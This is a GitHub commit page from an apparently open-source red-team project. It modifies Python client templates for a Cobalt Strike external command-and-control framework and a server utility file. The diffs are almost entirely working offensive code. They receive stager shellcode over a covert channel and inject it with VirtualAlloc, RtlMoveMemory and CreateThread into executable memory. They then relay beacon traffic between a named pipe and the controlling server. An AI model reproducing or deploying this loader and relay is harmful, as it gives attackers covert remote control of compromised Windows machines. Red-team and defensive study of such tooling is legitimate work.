Skip to content

Commit

Permalink
added client modification that I forgot to push
Browse files Browse the repository at this point in the history
  • Loading branch information
@Und3rf10w
Und3rf10w committed Jun 11, 2018
1 parent b9c2d42 commit 0c6b4f1
Show file tree
Hide file tree
Showing 3 changed files with 155 additions and 123 deletions.
92 changes: 58 additions & 34 deletions skeletons/frameworks/cobalt_strike/client/clientcore/clientcore.py
View file
Expand Up @@ -35,65 +35,85 @@
CDLL_NAME = ```[var:::cdll_name]```
CLIENT_ID = ```[var:::client_id]```

maxlen = 1024*1024
maxlen = 1024 * 1024
lib = CDLL(CDLL_NAME)

lib.start_beacon.argtypes = [c_char_p,c_int]
lib.start_beacon.argtypes = [c_char_p, c_int]
lib.start_beacon.restype = POINTER(HANDLE)


def start_beacon(payload):
return(lib.start_beacon(payload,len(payload)))
return (lib.start_beacon(payload, len(payload)))


lib.read_frame.argtypes = [POINTER(HANDLE),c_char_p,c_int]
lib.read_frame.argtypes = [POINTER(HANDLE), c_char_p, c_int]
lib.read_frame.restype = c_int


def ReadPipe(hPipe):
mem = create_string_buffer(maxlen)
l = lib.read_frame(hPipe,mem,maxlen)
if l < 0: return(-1)
chunk=mem.raw[:l]
return(chunk)
l = lib.read_frame(hPipe, mem, maxlen)
if l < 0: return (-1)
chunk = mem.raw[:l]
return (chunk)

lib.write_frame.argtypes = [POINTER(HANDLE),c_char_p,c_int]

lib.write_frame.argtypes = [POINTER(HANDLE), c_char_p, c_int]
lib.write_frame.restype = c_int
def WritePipe(hPipe,chunk):


def WritePipe(hPipe, chunk):
print "wp: %s\n" % len(chunk)
# print chunk # DEBUG
ret = lib.write_frame(hPipe,c_char_p(chunk),c_int(len(chunk)))
time.sleep(3)
print "ret=%s"%ret
return(ret)
ret = lib.write_frame(hPipe, c_char_p(chunk), c_int(len(chunk)))
sleep(3)
print "ret=%s" % ret
return (ret)


def task_encode(task):
return base64.b64encode(data)
return base64.b64encode(task)


def task_decode(task):
return base64.b64decode(data)
return base64.b64decode(task)


def notify_server():
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(C2_BLOCK_TIME)]
send_server_notification(notification_data_frame)
print "Notification that we're ready sent to server"
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(str(C2_BLOCK_TIME))]
print "notification_data_frame: "
preped_notify_data_frame = task_encode(str(notification_data_frame))
send_server_notification(preped_notify_data_frame)
print "Notification that we're ready sent to server"


def go():
print "Waiting for stager..." # DEBUG
p = recvData(CLIENT_ID)
print "Waiting for stager..." # DEBUG
p = retrieveData(CLIENT_ID)
# Convert this to a task frame
decoded_p = task_decode(p)
raw_task_frame = literal_eval(decoded_p)
decoded_task_frame = [raw_task_frame[0], task_decode(raw_task_frame[1])]

print "Got a stager! loading..."

# Wait a few seconds to give the stager a chance to load
sleep(2)

# Send the stager shellcode to the dll for injection and pipe creation
handle_beacon = start_beacon(p)
handle_beacon = start_beacon(decoded_task_frame[1])

# Grabbing and relaying the metadata from the SMB pipe is done during interact()
print "Loaded, and got handle to beacon. Getting METADATA."

return handle_beacon


def interact(handle_beacon):
while(True):
while (True):

# LOGIC TO CHECK FOR A CHUNK FROM THE BEACON
chunk = ReadPipe(handle_beacon)
if chunk < 0:
Expand All @@ -103,32 +123,36 @@ def interact(handle_beacon):
print "Received %d bytes from pipe" % (len(chunk))
print "relaying chunk to server"
resp_frame = [CLIENT_ID, task_encode(chunk)]
sendData(CLIENT_ID, resp_frame)
preped_resp_frame = task_encode(str(resp_frame))
sendData(CLIENT_ID, preped_resp_frame)

# LOGIC TO CHECK FOR A NEW TASK
print "Checking for new tasks from transport"

newTask = recvData()
newTask_frame = [newTask[0], task_decode(newTask[1])]

newTask = retrieveData(CLIENT_ID)
prep_new_task = task_decode(newTask)
raw_new_task = literal_eval(prep_new_task)
newTask_frame = [raw_new_task[0], task_decode(raw_new_task[1])]

print "Got new task: %s" % (newTask_frame[1])
print "Writing %s bytes to pipe" % (len(newTask_frame[1]))
r = WritePipe(handle_beacon, newTask_frame[1])
print "Wrote %s bytes to pipe" % (r)
sleep(C2_BLOCK_TIME/100) # python sleep is in seconds, C2_BLOCK_TIME in milliseconds
sleep(C2_BLOCK_TIME / 100) # python sleep is in seconds, C2_BLOCK_TIME in milliseconds


# Prepare the transport module
prepTransport()

# Notify the server that we're ready
notify_server()

#Get and inject the stager
# Get and inject the stager
handle_beacon = go()

# Run the main loop, keyboard escape available for debugging
try:
interact(handle_beacon)
except KeyboardInterrupt:
print "Caught escape signal"
exit(0)
exit(0)
182 changes: 95 additions & 87 deletions skeletons/frameworks/cobalt_strike/client/clientcore/full_clientcore.py
View file
Expand Up @@ -34,17 +34,19 @@
C2_BLOCK_TIME = int(```[var:::c2_block_time]```)
CLIENT_ID = ```[var:::client_id]```


def start_beacon(payload):
shellcode = bytearray(payload)
shellcode = bytearray(payload)
buf = (c_char * len(shellcode)).from_buffer(shellcode)
ptr = windll.kernel32.VirtualAlloc(c_int(0),
c_int(len(shellcode)),
c_int(0x3000), # MEM_COMMIT
c_int(0x40)) # PAGE_EXECUTE_READWRITE
c_int(0x3000), # MEM_COMMIT
c_int(0x40)) # PAGE_EXECUTE_READWRITE

windll.kernel32.RtlMoveMemory(c_int(ptr), buf, c_int(len(shellcode)))
windll.kernel32.CreateThread(None, c_int(0), c_int(ptr), None, c_int(0), None)


# Open the handle to the pipe
def open_handle():
GENERIC_READ = 0x80000000
Expand All @@ -54,70 +56,78 @@ def open_handle():
SECURITY_ANONYMOUS = 0x0
while 1:
pipe_handle = windll.kernel32.CreateFileA("\\\\.\\pipe" + ```[var:::c2_pipe_name]```,
GENERIC_READ|GENERIC_WRITE,
c_int(0),
None,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS,
None)
GENERIC_READ | GENERIC_WRITE,
c_int(0),
None,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS,
None)
if pipe_handle != -1:
break
return pipe_handle


def read_frame(handle):
print "Handle is: %s" % (str(handle))
result, size = win32file.ReadFile(handle, 4, None)
size = struct.unpack('<I', size)[0]
result, chunk = win32file.ReadFile(handle, size, None)
return chunk

def ReadPipe(handle):
return read_frame(handle)

def write_frame(handle, chunk):
wrote = c_int(0)
chunklen = len(chunk)
chunklen = struct.pack('<I', chunklen)
win32file.WriteFile(handle, chunklen, None)
win32file.WriteFile(handle, chunk, None)
return 0


def WritePipe(handle,chunk):
print "Writing to pipe: %s" %(chunk)
return write_frame(handle, chunk)

def task_encode(task):
return base64.b64encode(data)

def task_decode(task):
return base64.b64decode(data)

def notify_server():
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(C2_BLOCK_TIME)]
send_server_notification(notification_data_frame)
print "Notification that we're ready sent to server"

def go():
print "Waiting for stager..."
p = recvData(CLIENT_ID)
print "Got a stager! loading..."
sleep(2)
# Here they're writing the shellcode to the file, instead, we'll just send that to the handle...
beacon_thread = start_beacon(p)
handle_beacon = open_handle()
# Grabbing and relaying the metadata from the SMB pipe is done during interact()
print "Loaded, and got handle to beacon. Getting METADATA."

return handle_beacon

def interact(handle_beacon):
try:
while(True):

return pipe_handle

def read_frame(handle):
print "Handle is: %s" % (str(handle))
result, size = win32file.ReadFile(handle, 4, None)
size = struct.unpack('<I', size)[0]
result, chunk = win32file.ReadFile(handle, size, None)
return chunk

def ReadPipe(handle):
return read_frame(handle)

def write_frame(handle, chunk):
wrote = c_int(0)
chunklen = len(chunk)
chunklen = struct.pack('<I', chunklen)
win32file.WriteFile(handle, chunklen, None)
win32file.WriteFile(handle, chunk, None)
return 0

def WritePipe(handle, chunk):
print "Writing to pipe: %s" % (chunk)
return write_frame(handle, chunk)

def task_encode(task):
return base64.b64encode(task)

def task_decode(task):
return base64.b64decode(task)

def notify_server():
print "Notifying server that we're ready for a stager"
# Construct the data frame
notification_data_frame = [CLIENT_ID, task_encode(str(C2_BLOCK_TIME))]
print "notification_data_frame: "
preped_notify_data_frame = task_encode(str(notification_data_frame))
send_server_notification(preped_notify_data_frame)
print "Notification that we're ready sent to server"

def go():
print "Waiting for stager..." # DEBUG
p = retrieveData(CLIENT_ID)
# Convert this to a task frame
decoded_p = task_decode(p)
raw_task_frame = literal_eval(decoded_p)
decoded_task_frame = [raw_task_frame[0], task_decode(raw_task_frame[1])]

print "Got a stager! loading..."

# Wait a few seconds to give the stager a chance to load
sleep(2)

# Send the stager shellcode to the dll for injection and pipe creation
beacon_thread = start_beacon(decoded_task_frame[1])
handle_beacon = open_handle()

# Grabbing and relaying the metadata from the SMB pipe is done during interact()
print "Loaded, and got handle to beacon. Getting METADATA."

return handle_beacon

def interact(handle_beacon):
while (True):

# LOGIC TO CHECK FOR A CHUNK FROM THE BEACON
chunk = ReadPipe(handle_beacon)
if chunk < 0:
Expand All @@ -127,37 +137,35 @@ def interact(handle_beacon):
print "Received %d bytes from pipe" % (len(chunk))
print "relaying chunk to server"
resp_frame = [CLIENT_ID, task_encode(chunk)]
sendData(CLIENT_ID, resp_frame)
preped_resp_frame = task_encode(str(resp_frame))
sendData(CLIENT_ID, preped_resp_frame)

# LOGIC TO CHECK FOR A NEW TASK
print "Checking for new tasks from transport"

newTask = recvData(CLIENT_ID)

newTask_frame = [newTask[0], task_decode(newTask[1])]
newTask = retrieveData(CLIENT_ID)
prep_new_task = task_decode(newTask)
raw_new_task = literal_eval(prep_new_task)
newTask_frame = [raw_new_task[0], task_decode(raw_new_task[1])]

print "Got new task: %s" % (newTask_frame[1])
print "Writing %s bytes to pipe" % (len(newTask_frame[1]))
r = WritePipe(handle_beacon, newTask_frame[1])
print "Wrote %s bytes to pipe" % (r)
sleep(C2_BLOCK_TIME/100)
except KeyboardInterrupt:
print "Caught escape signal"
sys.exit(0)

sleep(C2_BLOCK_TIME / 100) # python sleep is in seconds, C2_BLOCK_TIME in milliseconds

# Prepare the transport module
prepTransport()
# Prepare the transport module
prepTransport()

# Notify the server that we're ready
notify_server()
# Notify the server that we're ready
notify_server()

#Get and inject the stager
handle_beacon = go()
# Get and inject the stager
handle_beacon = go()

# Run the main loop, keyboard escape available for debugging
try:
interact(handle_beacon)
except KeyboardInterrupt:
print "Caught escape signal"
exit(0)
# Run the main loop, keyboard escape available for debugging
try:
interact(handle_beacon)
except KeyboardInterrupt:
print "Caught escape signal"
exit(0)
4 changes: 2 additions & 2 deletions skeletons/frameworks/cobalt_strike/server/utils/commonUtils.py
View file
Expand Up @@ -78,8 +78,8 @@ def sendData(task_frame):
# This will upload the data via the covert channel
# returns a confirmation that the data has been sent
beacon_id = task_frame[0]
# if config.debug:
# print (color("RAW DATA TO BE SENT: ", status=False, yellow=True) + "%s") % (task_frame)
if config.debug:
print (color("RAW DATA TO BE SENT: ", status=False, yellow=True) + "%s") % (task_frame)
# Prepares the data to be sent via the covert channel
new_task_frame = str([beacon_id, task_encode(task_frame[1])])
encoded_task_frame = task_encode((new_task_frame))
Expand Down

0 comments on commit 0c6b4f1

Please sign in to comment.